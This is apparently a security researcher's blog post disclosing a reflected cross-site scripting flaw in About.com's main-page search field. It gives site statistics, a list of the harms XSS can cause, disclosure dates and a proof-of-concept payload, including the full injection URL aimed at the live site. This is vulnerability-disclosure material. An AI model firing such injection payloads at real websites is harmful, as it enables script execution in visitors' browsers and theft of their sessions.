About Group About.com Main Page’s Search Field XSS (Cross-Site Scripting) Security Vulnerabilities

About Group About.com Main Page’s Search Field XSS (Cross-Site Scripting) Security Vulnerabilities

 

 

(1) Domain Description:
http://www.about.com/

 

“For March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month.” (The New York Times)

 

“About.com, also known as The About Group (formerly About Inc.), is an Internet-based network of content that publishes articles and videos about various subjects on its “topic sites,” of which there are nearly 1,000. The website competes with other online resource sites and encyclopedias, including those of the Wikimedia Foundation” (Wikipedia)

 

“As of May 2013, About.com was receiving about 84 million unique monthly visitors.” (TechCrunch. AOL Inc.)

 

“According to About’s online media kit, nearly 1,000 “Experts” (freelance writers) contribute to the site by writing on various topics, including healthcare and travel.” (About.com)

 

 

about_search_xss1

 



(2) Result of Exploiting XSS Attacks

“Exploited XSS is commonly used to achieve the following malicious results

Identity theft

Accessing sensitive or restricted information

Gaining free access to otherwise paid for content

Spying on user’s web browsing habits

Altering browser functionality

Public defamation of an individual or corporation

Web application defacement

Denial of Service attacks (DOS)

” (Acunetix)

 

 

 

(3) Vulnerabilities Details:

About Group has a security problem. It can be exploited by XSS (cross site scripting) attacks.

The vulnerability can be attacked without user login. Tests were performed on Mozilla Firefox (33.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in Windows 7.

 

The vulnerability occurs at about.com main page’s search field, e.g.
http://www.about.com/?q=googleandroidsystem

 

 

POC Codes, e.g.

“–/>”><img src=x onerror=prompt(/tetraph/)>

http://www.about.com/?q=”–/>”><img src=x onerror=prompt(/tetraph/)>

 

POC Video:
https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be

 

Blog Details:
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html
http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/

 

 

 

Vulnerability Disclosure:
Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No one replied. Until now, they are still unpatched.

 

 

Vulnerability Discover:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://www.tatraph.com/wangjing

 

 

 

Wang Jing

Leave a Reply

Your email address will not be published. Required fields are marked *